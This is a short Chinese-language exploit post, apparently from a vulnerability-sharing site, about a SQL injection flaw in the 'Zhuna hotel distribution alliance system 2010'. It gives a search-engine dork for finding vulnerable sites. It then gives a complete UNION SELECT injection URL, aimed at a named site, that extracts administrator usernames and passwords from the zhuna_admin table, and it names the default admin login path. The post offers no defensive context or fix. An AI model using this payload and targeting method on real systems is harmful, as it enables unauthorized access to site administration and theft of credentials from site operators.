住哪酒店分销联盟系统2010 SQL注入漏洞
适用版本:住哪酒店分销联盟系统2010
Search: inurl:index.php?m=hotelinfo
http://www.badguest.cn /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
默认后台:index.php?m=admin/login
上一篇:聚商宝2.0漏洞